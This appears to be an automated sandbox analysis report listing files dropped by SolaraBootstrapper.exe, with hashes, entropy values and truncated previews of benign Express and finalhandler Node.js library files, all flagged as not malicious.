                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var finalhandler = require('finalhandler');.var Router = require('./router');.var methods = require('methods');.var middleware = require('./middleware/init');.var query = require('./middleware/query');.var debug = require('debug')('express:application');.var View = require('./view');.var http = require('http');.var compileETag = require('./utils').compileETag;.var compileQueryParser = require('./utils').compileQueryParser;.var compileTrust = require('./utils').compileTrust;.var deprecate = require('depd')('express');.var flatten = require('array-flatten');.var merge = require('utils-merge');.var resolve = require('path').resolve;.var setPrototypeOf = require('setprototypeof')../**. * Module variables.. * @private. */..var hasOwnProperty = Object.prototype.hasOwnPr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2409
                                                  Entropy (8bit):4.894117326550773
                                                  Encrypted:false
                                                  SSDEEP:48:6VkJiFLCajbbm0Awl/jVfNHlXNlDXSYzWwMDo2c5sLwIvGpeDlgJWigxzD:u7FdjHm5wlPHlXNlDXSYzWwYo2c5qw0z
                                                  MD5:D467BC485EDDF6D38278BC6B1DC16389
                                                  SHA1:E233882DE62EB095B3CAE0B2956E8776E6AF3D6A
                                                  SHA-256:2F25585C03C3050779C8F5F00597F8653F4FB8A97448EF8EF8CB21E65BA4D15D
                                                  SHA-512:2ADD66B4F2E8CE463449CA8F2EAC19363844B6AB159A41B42163028C57F07A4245EBEFE759A6F90E8685B5BD239C969FE99366EFF89378CB8B92B8A703DACD61
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. */..var bodyParser = require('body-parser').var EventEmitter = require('events').EventEmitter;.var mixin = require('merge-descriptors');.var proto = require('./application');.var Route = require('./router/route');.var Router = require('./router');.var req = require('./request');.var res = require('./response');../**. * Expose `createApplication()`.. */..exports = module.exports = createApplication;../**. * Create an express application.. *. * @return {Function}. * @api public. */..function createApplication() {. var app = function(req, res, next) {. app.handle(req, res, next);. };.. mixin(app, EventEmitter.prototype, false);. mixin(app, proto, false);.. // expose the prototype that will get set on requests. app.request = Object.create(req, {. app: { configurable: true
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):853
                                                  Entropy (8bit):4.971879744758794
                                                  Encrypted:false
                                                  SSDEEP:24:T+VR+s7+HzRNLyJ4FarCBAbcm9wcSgDtyfA2Wo1PRcojUJD/H:6VkJTRNLy+UZb19/SDfA2l1JXjUJD
                                                  MD5:3711AE7EA348D39A41C5139A63E89C12
                                                  SHA1:4B8B9456B57267D5892B097D4FF316838E41DFDD
                                                  SHA-256:48C1D12F1494B20377FCDEEC9056272EFF84ED8C081E1E56DC2AEA395F77D19C
                                                  SHA-512:67EA7DBB5C8CF37B524B246FEDA839A328A824C4CDFD9BF9FF97F79F28C45048B3F213E363B89F2BE3837815C41903F62D3479DBBCC5A9545E8AEBF21474668A
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var setPrototypeOf = require('setprototypeof')../**. * Initialization middleware, exposing the. * request and response to each other, as well. * as defaulting the X-Powered-By header field.. *. * @param {Function} app. * @return {Function}. * @api private. */..exports.init = function(app){. return function expressInit(req, res, next){. if (app.enabled('x-powered-by')) res.setHeader('X-Powered-By', 'Express');. req.res = res;. res.req = req;. req.next = next;.. setPrototypeOf(req, app.request). setPrototypeOf(res, app.response).. res.locals = res.locals || Object.create(null);.. next();. };.};..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):885
                                                  Entropy (8bit):4.911087592595629
                                                  Encrypted:false
                                                  SSDEEP:24:T+VR+s7+1wAoBeqL35fMwl3rxXnpNglD/f:6VkJqj1dMwlNpNQz
                                                  MD5:A6E9A6C92C5BFDD9D7B08B267A3B1D44
                                                  SHA1:A66AA642AD6C666470803022CC7C5C46732BD5BC
                                                  SHA-256:6EDCE3963588B42E41942900B24218E665B97DF0C0B1C74090B2B934FA68CA08
                                                  SHA-512:00DBD6EC9969EA9D859A9FD30339A5DD4FC70F2C18D1B49A9A298389A4473A8E7F5A6FA8D2A820053643C143D7202DFDBA59236E19AC28B5C19225D2DF52F386
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. */..var merge = require('utils-merge').var parseUrl = require('parseurl');.var qs = require('qs');../**. * @param {Object} options. * @return {Function}. * @api public. */..module.exports = function query(options) {. var opts = merge({}, options). var queryparse = qs.parse;.. if (typeof options === 'function') {. queryparse = options;. opts = undefined;. }.. if (opts !== undefined && opts.allowPrototypes === undefined) {. // back-compat for qs module. opts.allowPrototypes = true;. }.. return function query(req, res, next){. if (!req.query) {. var val = parseUrl(req).query;. req.query = queryparse(val, opts);. }.. next();. };.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):12505
                                                  Entropy (8bit):4.944383698965698
                                                  Encrypted:false
                                                  SSDEEP:384:uqOLFAdcH1y3xzl8TuoksKJW9vsRHgViHfWReYSi59lrvVK:+Adc2lEfl79vs17HfWRSidvVK
                                                  MD5:7DE9073E4CD5121EBD975F8FC252E3B3
                                                  SHA1:8C91F08385B3D241B180EA5326A3E1BE016945D1
                                                  SHA-256:64AC10752C0516D789CB0698BB433586D4CE3B46F7F06EE3CB2880762B8BDA40
                                                  SHA-512:F7CCD3077E6A4D1E2A2B008BB3156DA88F7705B92086B56755C7EC95CCDF1F79583AE400F51939C9DE6DAF03E9F6641371720186F19366C8111E7471351621B1
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var accepts = require('accepts');.var deprecate = require('depd')('express');.var isIP = require('net').isIP;.var typeis = require('type-is');.var http = require('http');.var fresh = require('fresh');.var parseRange = require('range-parser');.var parse = require('parseurl');.var proxyaddr = require('proxy-addr');../**. * Request prototype.. * @public. */..var req = Object.create(http.IncomingMessage.prototype)../**. * Module exports.. * @public. */..module.exports = req../**. * Return request header.. *. * The `Referrer` header field is special-cased,. * both `Referrer` and `Referer` are interchangeable.. *. * Examples:. *. * req.get('Content-Type');. * // => "text/plain". *. * req.get('content-type');. * // => "text/plain". *. * req.get('Somet
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):28339
                                                  Entropy (8bit):4.8853987336007485
                                                  Encrypted:false
                                                  SSDEEP:768:tz7qICPSMJNTNXdj/8WByFJAhArYWqdUpa:1qHnJFZdj/8WByFJ6ArUQa
                                                  MD5:B95E98D87C48B055F2E37CF427B2EDBF
                                                  SHA1:727206ECCBBD4F4C17FD9E0E9A940DCDF399E014
                                                  SHA-256:8761B1592827B8D4708DC17810A7359B35CA469BDE3BB10AABDCE6A1884629A8
                                                  SHA-512:109D817D3DFEE1C6F7058970BBE0255A9EC412F102CB4C2115B235189904219728877DEEEDCBDB9F12138B8518F1E89A63BBEDFD92E9657A60E45DB77EF1E059
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var Buffer = require('safe-buffer').Buffer.var contentDisposition = require('content-disposition');.var createError = require('http-errors').var deprecate = require('depd')('express');.var encodeUrl = require('encodeurl');.var escapeHtml = require('escape-html');.var http = require('http');.var isAbsolute = require('./utils').isAbsolute;.var onFinished = require('on-finished');.var path = require('path');.var statuses = require('statuses').var merge = require('utils-merge');.var sign = require('cookie-signature').sign;.var normalizeType = require('./utils').normalizeType;.var normalizeTypes = require('./utils').normalizeTypes;.var setCharset = require('./utils').setCharset;.var cookie = require('cookie');.var send = require('send');.var extname = path.extname;.var mime = send.mime;.var resolve = pat
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):15123
                                                  Entropy (8bit):4.740050696950153
                                                  Encrypted:false
                                                  SSDEEP:384:udXSdzoyXJwl082ungnSy3quQKgOXAWugvfQB:2czoOyA3quQKzwVgvfa
                                                  MD5:97A86CF767627BBA9B50BFFBDDA677A8
                                                  SHA1:C71D3D8FF843D6687C9D28874374A828D61792EA
                                                  SHA-256:19C5CA9B025396612DBE464D07FBE7104FF9170C4D6A1C7E5507DF4DBBF4D5CB
                                                  SHA-512:F5755588F4B87E50F4B3CB32C3D5797D896E63D011F9968A68CE1921521D79A6D4E3383E7EB9C8538F3F97504552702860707D4DC186BB781A8060EBC08E3CDD
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var Route = require('./route');.var Layer = require('./layer');.var methods = require('methods');.var mixin = require('utils-merge');.var debug = require('debug')('express:router');.var deprecate = require('depd')('express');.var flatten = require('array-flatten');.var parseUrl = require('parseurl');.var setPrototypeOf = require('setprototypeof')../**. * Module variables.. * @private. */..var objectRegExp = /^\[object (\S+)\]$/;.var slice = Array.prototype.slice;.var toString = Object.prototype.toString;../**. * Initialize a new `Router` with the given `options`.. *. * @param {Object} [options]. * @return {Router} which is a callable function. * @public. */..var proto = module.exports = function(options) {. var opts = options || {};.. function router(req, res, n
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3296
                                                  Entropy (8bit):4.8012259683932115
                                                  Encrypted:false
                                                  SSDEEP:48:6VkJgAxq9H7/q7RGbhfI4gGu0d7o7PqgLeGv7w8qKKXOVG5TPPLdmnzFo9rjtwU4:uYC/HfI4gh0MHL5LgdtYzFo9rOUrm8Mb
                                                  MD5:C6E16965EF05CC02CFEE78022496ABAB
                                                  SHA1:302244D96AFC6D6FCAAA3AFAE016FBE8168F192C
                                                  SHA-256:C90709DCBA8D9A6CFD1F2B4EF6D7A22D833E317F0C876D884342CEE5A96F8A02
                                                  SHA-512:7DDCAB429A9C8857BD7E9170C92EBFD3E3C59CE52323021B53E24BA776ABA3A757098AE9F3264585E4FE5F3C331E747307301344DC19EAE9345E68629A5C440C
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var pathRegexp = require('path-to-regexp');.var debug = require('debug')('express:router:layer');../**. * Module variables.. * @private. */..var hasOwnProperty = Object.prototype.hasOwnProperty;../**. * Module exports.. * @public. */..module.exports = Layer;..function Layer(path, options, fn) {. if (!(this instanceof Layer)) {. return new Layer(path, options, fn);. }.. debug('new %o', path). var opts = options || {};.. this.handle = fn;. this.name = fn.name || '<anonymous>';. this.params = undefined;. this.path = undefined;. this.regexp = pathRegexp(path, this.keys = [], opts);.. // set fast path flags. this.regexp.fast_star = path === '*'. this.regexp.fast_slash = path === '/' && opts.end === false.}../**. * Handle the error for the layer.. *. * @p
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4399
                                                  Entropy (8bit):4.797709127541757
                                                  Encrypted:false
                                                  SSDEEP:96:uMM7HcXNnPON7NOSjMiCg0AYecAueTg0hH4XEaOTXvg:uMM7Hk5POlNOSAiCg0AYepuigoSEtTvg
                                                  MD5:F369E8206668EED53791E8633D8B9850
                                                  SHA1:415EABADE20B94E1863E7D1CB89DB82243294A24
                                                  SHA-256:86DB123570815A63DC23AA88D73E1B3DCE908692AC2E3CF20FA350D69DE63337
                                                  SHA-512:41BD013D1EE562230C58CF3789A483D5DC7D3FA3286A18B990B8E1F8222E3A9721798BD7ADF78062CC8AEBE7BDBF0FB788554CDE003B413CB7F9260CFE8C017A
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var debug = require('debug')('express:router:route');.var flatten = require('array-flatten');.var Layer = require('./layer');.var methods = require('methods');../**. * Module variables.. * @private. */..var slice = Array.prototype.slice;.var toString = Object.prototype.toString;../**. * Module exports.. * @public. */..module.exports = Route;../**. * Initialize `Route` with the given `path`,. *. * @param {String} path. * @public. */..function Route(path) {. this.path = path;. this.stack = [];.. debug('new %o', path).. // route handlers for various http methods. this.methods = {};.}../**. * Determine if the route handles a given method.. * @private. */..Route.prototype._handles_method = function _handles_method(method) {. if (this.methods._all) {. return tr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5871
                                                  Entropy (8bit):4.898946986989178
                                                  Encrypted:false
                                                  SSDEEP:96:uXcRzPReHkGVZwJ5J98tK9vgkDmKv0DzJal2g6PigcwOVcz2aIDzMcrJk:uXsJePZYhxDZv4z+HYiglOVcz27/Mcry
                                                  MD5:D0AF8049AEAE0B030CADA613FE49EF9C
                                                  SHA1:8D7970A663C3045C366545610EE53F0BA0F33144
                                                  SHA-256:9035C6D946ECE511E749043CC823E32D3EFE6727B8A9D52AAC89649E99584F09
                                                  SHA-512:3FBF3AFBE7711B7426E81129B3D1728D1B8717C6F0D7BA574D6089AEF6BB5E6E5C566A50CD5D1CED5C385B2FA9F5C378ECB7FCBFE4970FA7DB805932422578B8
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @api private. */..var Buffer = require('safe-buffer').Buffer.var contentDisposition = require('content-disposition');.var contentType = require('content-type');.var deprecate = require('depd')('express');.var flatten = require('array-flatten');.var mime = require('send').mime;.var etag = require('etag');.var proxyaddr = require('proxy-addr');.var qs = require('qs');.var querystring = require('querystring');../**. * Return strong ETag for `body`.. *. * @param {String|Buffer} body. * @param {String} [encoding]. * @return {String}. * @api private. */..exports.etag = createETagGenerator({ weak: false })../**. * Return weak ETag for `body`.. *. * @param {String|Buffer} body. * @param {String} [encoding]. * @return {String}. * @api private. */..exports.wetag = createETagGenerator({ weak: true })../**. * Check if `path`
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3325
                                                  Entropy (8bit):4.884262682122576
                                                  Encrypted:false
                                                  SSDEEP:96:uMeYKks7x6BfOEnaJCpiq6qDTS8u2YaYpL9:uMeCs7EBfzaJfqxQFpL9
                                                  MD5:09C05D27B2F11D1BD70FB54C24C60311
                                                  SHA1:4CFB7F23CB0A4B9F11DACC7E81DCA3782F63552F
                                                  SHA-256:EC627880C1B43AEE5887164AC2E9C58F01E4EE8086E23A829EDDF1AF3858C021
                                                  SHA-512:0AA9EF9F07692D0C254CDEDDE8063B5D1DD4F5A81969F5293B74BC18B2169041892A164E3C1FBDCBE06C8AAFABD4C28E9072C754FB6A8B833E6153E1C359886F
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var debug = require('debug')('express:view');.var path = require('path');.var fs = require('fs');../**. * Module variables.. * @private. */..var dirname = path.dirname;.var basename = path.basename;.var extname = path.extname;.var join = path.join;.var resolve = path.resolve;../**. * Module exports.. * @public. */..module.exports = View;../**. * Initialize a new `View` with the given `name`.. *. * Options:. *. * - `defaultEngine` the default template engine name. * - `engines` template engine require() cache. * - `root` root path for view lookup. *. * @param {string} name. * @param {object} options. * @public. */..function View(name, options) {. var opts = options || {};.. this.defaultEngine = opts.defaultEngine;. this.ext = extname(name);. this.name = n
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2597
                                                  Entropy (8bit):4.7539656629700415
                                                  Encrypted:false
                                                  SSDEEP:48:2gh/NXnDcEJDyi+476U5RxYhNtuACk3w8Be7LkoWO2v2TLL4XVxrl:2gB9nwEJDF+4eU+LCKgLkoY04XVxrl
                                                  MD5:3B5B76B70B0A549DCE72C5A02756D2A8
                                                  SHA1:07786BAEBB5C52882E28A8BD281C9A36D63DD116
                                                  SHA-256:BDD67333AB62B0BFEB10ECBBB23936DB57B743A3EEC580A354591FDF63334859
                                                  SHA-512:BB266DFA725421FB26D26FDA0F45A5FA5CD832667B05F27CEAF4E7FC1E032AEEA8700493CFDD2941C3C38CD166EEE1000D2B9AE3DDEF375714E25A2027A943A3
                                                  Malicious:false
                                                  Preview:{. "name": "express",. "description": "Fast, unopinionated, minimalist web framework",. "version": "4.19.2",. "author": "TJ Holowaychuk <tj@vision-media.ca>",. "contributors": [. "Aaron Heckmann <aaron.heckmann+github@gmail.com>",. "Ciaran Jessup <ciaranj@gmail.com>",. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Guillermo Rauch <rauchg@gmail.com>",. "Jonathan Ong <me@jongleberry.com>",. "Roman Shtylman <shtylman+expressjs@gmail.com>",. "Young Jae Sim <hanul@hanul.me>". ],. "license": "MIT",. "repository": "expressjs/express",. "homepage": "http://expressjs.com/",. "keywords": [. "express",. "framework",. "sinatra",. "web",. "http",. "rest",. "restful",. "router",. "app",. "api". ],. "dependencies": {. "accepts": "~1.3.8",. "array-flatten": "1.1.1",. "body-parser": "1.20.2",. "content-disposition": "0.5.4",. "content-type": "~1.0.4",. "cookie": "0.6.0",. "cookie-signature": "1.0.6",. "deb
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4292
                                                  Entropy (8bit):4.886144130907238
                                                  Encrypted:false
                                                  SSDEEP:96:va4n4/AwRx8+ebFj6JJPdYXH+rtn6oZBn:C4n73d6BYXcBT3
                                                  MD5:061C80FD951E66DFB115A351A3F7547E
                                                  SHA1:8C8B29DF85B7D82D17361838D822D9C464D733C2
                                                  SHA-256:5C7065D29A2710C69516308350A51A140DEDD0E4527F27578405087010CD4B7F
                                                  SHA-512:00AE061B93BD3F7143A55922083F16AE281852332E5D1CEE867417FC1B1189400DEF1E6700FB03EF304D0899E31C1E23F1D38CFC6C6EFA14A9466958650359A7
                                                  Malicious:false
                                                  Preview:1.2.0 / 2022-03-22.==================.. * Remove set content headers that break response. * deps: on-finished@2.4.1. * deps: statuses@2.0.1. - Rename `425 Unordered Collection` to standard `425 Too Early`..1.1.2 / 2019-05-09.==================.. * Set stricter `Content-Security-Policy` header. * deps: parseurl@~1.3.3. * deps: statuses@~1.5.0..1.1.1 / 2018-03-06.==================.. * Fix 404 output for bad / missing pathnames. * deps: encodeurl@~1.0.2. - Fix encoding `%` as last character. * deps: statuses@~1.4.0..1.1.0 / 2017-09-24.==================.. * Use `res.headersSent` when available..1.0.6 / 2017-09-22.==================.. * deps: debug@2.6.9..1.0.5 / 2017-09-15.==================.. * deps: parseurl@~1.3.2. - perf: reduce overhead for full URLs. - perf: unroll the "fast-path" `RegExp`..1.0.4 / 2017-08-03.==================.. * deps: debug@2.6.8..1.0.3 / 2017-05-16.==================.. * deps: debug@2.6.7. - deps: ms@2.0.0..1.0.2 / 2017-04-22.======
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1119
                                                  Entropy (8bit):5.149960307757634
                                                  Encrypted:false
                                                  SSDEEP:24:/iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:/iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:462B10B32BB9175B97944AABEF4AA171
                                                  SHA1:D07C312C66BE4BDDABA627E873B9E0C5ECBA7CD4
                                                  SHA-256:47DCCCF62BF40469D23849B0B1DC8DF9FC91BCE219B880C638D4DC4596E6B5CF
                                                  SHA-512:EF8DC7AC579171278A483D216628C695F451EADCC2DA1DB672E7451CFCB1407C5ADE28EA7BD2B7F91BB2E29BF0D8A637F550955D648F917A1EB2A93F8E93BA1F
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2022 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TO
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4133
                                                  Entropy (8bit):4.970675126623142
                                                  Encrypted:false
                                                  SSDEEP:96:dXChQ215Sx5V12aU7Pdfa+m6Ux1KxOV5erOdYxJV5erKBa2AMaimUu:dy45V13T+mLb56H56yanMa1Uu
                                                  MD5:0D643D34FEF82EAA878C5432D35961F8
                                                  SHA1:1BDA3F727CF7A20BAEA2AD613B3A8056774AB425
                                                  SHA-256:D3D128173E4AF0F2825667425069051DB5655ED810DD59344404523DDE49AEB3
                                                  SHA-512:E8C68A75A920D8FF4157C8D3706EF91F56D702FF9E357E1A51F869D361B51B9085DFD434963EA61C4BC33964B0E29FAA98A8D648364885BAAB854E2FE8CD22FC
                                                  Malicious:false
                                                  Preview:# finalhandler..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-image]][node-url].[![Build Status][github-actions-ci-image]][github-actions-ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Node.js function to invoke as the final step to respond to HTTP request...## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install finalhandler.```..## API..```js.var finalhandler = require('finalhandler').```..### finalhandler(req, res, [options])..Returns function to be invoked as the final step for the given `req` and `res`..This function is to be invoked as `fn(err)`. If `err` is falsy, the handler will.write out a 404 response to the `res`. If it is truthy, an error response will.be written out to the `
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1202
                                                  Entropy (8bit):4.469828769598368
                                                  Encrypted:false
                                                  SSDEEP:24:1ZdoSZ8gGz6KHbaKWjdbDF925a/7kJyEyF0eOCYunEfu7WR:1BS3zUKa/7xPYun7WR
                                                  MD5:8C218C1D06FDDE7CBB4926CA8A11144F
                                                  SHA1:3B7D36C55AC91ECDDD14CEBB0F8EB158B443D776
                                                  SHA-256:D0366646BABEB58FF9CB81D794063822B86BD3F3C12E96133C9F55A0812891CD
                                                  SHA-512:BD882A7E1650D032543AD58675FAF52139E1B21C4B3FB809AB7F2D397C5988C0B0C1E1840BA755C78FBA757D36D011B0A6039C37F08770AFF76844C26D498213
                                                  Malicious:false
                                                  Preview:# Security Policies and Procedures..## Reporting a Bug..The `finalhandler` team and community take all security bugs seriously. Thank.you for improving the security of Express. We appreciate your efforts and.responsible disclosure and will make every effort to acknowledge your.contributions...Report security bugs by emailing the current owner(s) of `finalhandler`. This.information can be found in the npm registry using the command.`npm owner ls finalhandler`..If unsure or unable to get the information from the above, open an issue.in the [project issue tracker](https://github.com/pillarjs/finalhandler/issues).asking for the current contact information...To ensure the timely response to your report, please ensure that the entirety.of the report is contained within the email body and not solely behind a web.link or an attachment...At least one owner will acknowledge your email within 48 hours, and will send a.more detailed response within 48 hours indicating the next steps in handling.yo
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):6689
                                                  Entropy (8bit):4.828870033450615
                                                  Encrypted:false
                                                  SSDEEP:192:vMlJv4mtdenb3bGxSEhkhcC76QM6clzM8ilkv958nu4dEljyIYo4:vMom56hnw8
                                                  MD5:D50E9637775204F194D629000189F69C
                                                  SHA1:50D1A1725CB273B0A8E30433DABC43D65F55169B
                                                  SHA-256:96900B458B12085EA16F228151439D9A7BAE6B5D45248E355AD617F4DC213540
                                                  SHA-512:563A8375E3AB7936162A9D209800F8B41C416C1500FE24DE817871C3E5489E8FAF5A4DCB7FB239F697A8736432356E60ECF1578D0AAFC0DE80D6E0AE90C34AAD
                                                  Malicious:false
                                                  Preview:/*!. * finalhandler. * Copyright(c) 2014-2022 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var debug = require('debug')('finalhandler').var encodeUrl = require('encodeurl').var escapeHtml = require('escape-html').var onFinished = require('on-finished').var parseUrl = require('parseurl').var statuses = require('statuses').var unpipe = require('unpipe')../**. * Module variables.. * @private. */..var DOUBLE_SPACE_REGEXP = /\x20{2}/g.var NEWLINE_REGEXP = /\n/g../* istanbul ignore next */.var defer = typeof setImmediate === 'function'. ? setImmediate. : function (fn) { process.nextTick(fn.bind.apply(fn, arguments)) }.var isFinished = onFinished.isFinished../**. * Create a minimal HTML document.. *. * @param {string} message. * @private. */..function createHtmlDocument (message) {. var body = escapeHtml(message). .replace(NEWLINE_REGEXP, '<br>'). .replace(DOUBLE_SPACE_REGEXP, ' &nbsp;').. return '<!DOCTYPE html>\n' +.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1207
                                                  Entropy (8bit):4.763086191570409
                                                  Encrypted:false
                                                  SSDEEP:24:vB6aQdr15RPY64Rx714sQGejYuNCHRIZBlWenwfMTknjZKLvP:5tGXWRxeFGejYuNCHRIzUK6MTUjorP
                                                  MD5:3D09AC571E0B6EAF8FDB9806118B6D30
                                                  SHA1:EB758BB6A7D3E4F32F0FA2F941265678539E74F1
                                                  SHA-256:243D853D4386C4132508AE9A99E5176B25BE7F5CB6967BC1BAB241F20E937E72
                                                  SHA-512:0207CF364E3EAC974CAE61EC68FE3975FD1F1EB6150F51293CE67F62DBB0F27A3D9C193101EF282DCD099FC653CA73CD3C875C18E5E266964038E3334697B5B4
                                                  Malicious:false
                                                  Preview:{. "name": "finalhandler",. "description": "Node.js final http responder",. "version": "1.2.0",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "repository": "pillarjs/finalhandler",. "dependencies": {. "debug": "2.6.9",. "encodeurl": "~1.0.2",. "escape-html": "~1.0.3",. "on-finished": "2.4.1",. "parseurl": "~1.3.3",. "statuses": "2.0.1",. "unpipe": "~1.0.0". },. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.2.2",. "nyc": "15.1.0",. "readable-stream": "2.3.6",. "safe-buffer": "5.2.1",. "supertest": "6.2.2". },. "files": [. "LICENSE",. "HISTORY.md",. "SECURITY.md",. "index.js". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "lint": "esli
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):400
                                                  Entropy (8bit):4.590668775133485
                                                  Encrypted:false
                                                  SSDEEP:6:gFDd+ENX2FAUvSSYTNiv7ZdyTtAxjYYw2GFuZE9FJAweCMNq1FyT3SXHpRZ0N2:g7+kmVQhiv7jyZ4jYYvOFJeVhWXpRCA
                                                  MD5:BA854F852A81318EA0356F4286E20DAB
                                                  SHA1:BD0EFE669AD506AB258BB461D1444D74DD288CE5
